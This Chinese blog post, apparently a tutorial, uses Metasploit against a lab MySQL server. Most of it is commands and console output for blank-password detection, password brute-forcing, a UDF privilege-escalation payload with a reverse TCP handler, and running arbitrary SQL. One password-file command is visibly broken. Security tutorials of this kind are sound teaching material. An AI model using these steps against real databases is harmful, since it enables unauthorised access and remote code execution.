千万不要再这样操作MySQL了，分分钟给你破解

科技 08-28 来源：运维朱工

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。

登录msf

# 登录msf
┌──(root㉿kali)-[~]
└─# msfconsole

使用mysql_login模块

该模块可用于暴力破解，或者空密码检测。

# 查找MySQL登录模块
msf6 > search mysql_login
Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login

# 使用模块，可以指定模块名或者使用id
msf6 > use 0
或者
msf6 > use auxiliary/scanner/mysql/mysql_login

# 显示参数选项，Required为yes则表示需要提供值，有的选项会有默认值（Current Setting）
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted:
                                                none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framewo
                                                rk/wiki/Using-Metasploit
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per
                                                 line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

mysql_login空密码检测

空密码检测的前提是MySQL对当前的主机开放了权限。常见的危险命令就是授权时直接使用%，这表示所有主机均可连接。

# 空密码检测：
## 设置远程主机即可，USERNAME默认是root，BLANK_PASSWORDS默认是true
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Found remote MySQL version 5.5.68
[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Success: 'root:'
[*] 192.168.75.121:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

mysql_login密码爆破

# 准备密码文件
cat >/ tmp/passwd.txt < set rhosts 192.168.75.121
rhosts => 192.168.75.121

# 设置root登录密码
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file /tmp/passwd.txt
pass_file => /tmp/passwd.txt

# 攻击,可以看到密码root123456是正确的。
msf6 auxiliary(scanner/mysql/mysql_login) > run

[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Found remote MySQL version 5.5.68
[-] 192.168.75.121:3306     - 192.168.75.121:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'192.168.75.123' (using password: NO))
[-] 192.168.75.121:3306     - 192.168.75.121:3306 - LOGIN FAILED: root:123456 (Incorrect: Access denied for user 'root'@'192.168.75.123' (using password: YES))
[+] 192.168.75.121:3306     - 192.168.75.121:3306 - Success: 'root:root123456'
[*] 192.168.75.121:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nmap空密码检测

msf6 > nmap -p3306 --script=mysql-empty-password.nse 192.168.75.121

# db_nmap会将扫描结果同步到数据库中,需提前配置好数据库连接
msf6 > db_nmap -p3306 --script=mysql-empty-password.nse 192.168.75.121
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-12 14:44 CST
[*] Nmap: Nmap scan report for 192.168.75.121
[*] Nmap: Host is up (0.00089s latency).
[*] Nmap: PORT     STATE SERVICE
[*] Nmap: 3306/tcp open  mysql
[*] Nmap: | mysql-empty-password:
[*] Nmap: |_  root account has empty password
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

UDF提权

使用mysql_udf_payload上传lib模块

msf6 > search udf
msf6 > use 3
msf6 exploit(multi/mysql/mysql_udf_payload) > how options
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 192.168.75.121
msf6 exploit(multi/mysql/mysql_udf_payload) > set password root123456
msf6 exploit(multi/mysql/mysql_udf_payload) > run
[*] Started reverse TCP handler on 192.168.75.143:4444 
[*] 192.168.75.121:3306 - Checking target architecture...
[*] 192.168.75.121:3306 - Checking for sys_exec()...
[*] 192.168.75.121:3306 - Checking target architecture...
[*] 192.168.75.121:3306 - Checking for MySQL plugin directory...
[*] 192.168.75.121:3306 - Target arch (linux64) and target path both okay.
[*] 192.168.75.121:3306 - Uploading lib_mysqludf_sys_64.so library to /usr/lib64/mysql/plugin/nixZkpEs.so...
[*] 192.168.75.121:3306 - Checking for sys_exec()...
[*] 192.168.75.121:3306 - Command Stager progress -  55.47% done (1444/2603 bytes)
[*] 192.168.75.121:3306 - Command Stager progress - 100.00% done (2603/2603 bytes)
[*] Exploit completed, but no session was created.

如果在run时报错，提示无法创建xxx.so文件，则表示没有相关权限，远程服务器有设置selinux，以及/usr/lib64/mysql/plugin/目录没有写权限，都会导致上面的问题。

使用mysql_sql执行攻击sql语句

上传完模块之后即可执行相关sql语句了。

# 查找mysql_sql模块
msf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_sql
# 选择第一个
msf6 exploit(multi/mysql/mysql_udf_payload) > use 0
# 设置远程主机
msf6 auxiliary(admin/mysql/mysql_sql) > set rhosts 192.168.75.121
rhosts => 192.168.75.121
# 设置密码（密码来自前面的破解）
msf6 auxiliary(admin/mysql/mysql_sql) > set password root123456
password => root123456
# 设置用户
msf6 auxiliary(admin/mysql/mysql_sql) > set username root
username => root
# 默认执行查看数据库版本的sql语句
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 192.168.75.121

[*] 192.168.75.121:3306 - Sending statement: 'select version()'...
[*] 192.168.75.121:3306 -  | 5.5.68-MariaDB |
[*] Auxiliary module execution completed

# 执行自定义sql语句
msf6 auxiliary(admin/mysql/mysql_sql) > set sql "select user,host from mysql.user"
sql => select user,host from mysql.user
msf6 auxiliary(admin/mysql/mysql_sql) > run
[*] Running module against 192.168.75.121
[*] 192.168.75.121:3306 - Sending statement: 'select user,host from mysql.user'...
[*] 192.168.75.121:3306 -  | root | % |
[*] 192.168.75.121:3306 -  | test | % |
[*] 192.168.75.121:3306 -  | root | 127.0.0.1 |
[*] 192.168.75.121:3306 -  |  | 192-168-75-121 |
[*] 192.168.75.121:3306 -  | root | 192-168-75-121 |
[*] 192.168.75.121:3306 -  | root | ::1 |
[*] 192.168.75.121:3306 -  |  | localhost |
[*] 192.168.75.121:3306 -  | root | localhost |
[*] Auxiliary module execution completed

欢迎点赞，关注，你的喜欢就是我原创的动力，Jenkins系列将会持续更新。

如果想获取最新文章更新，以及常用软件，可以关注公众号： 运维朱工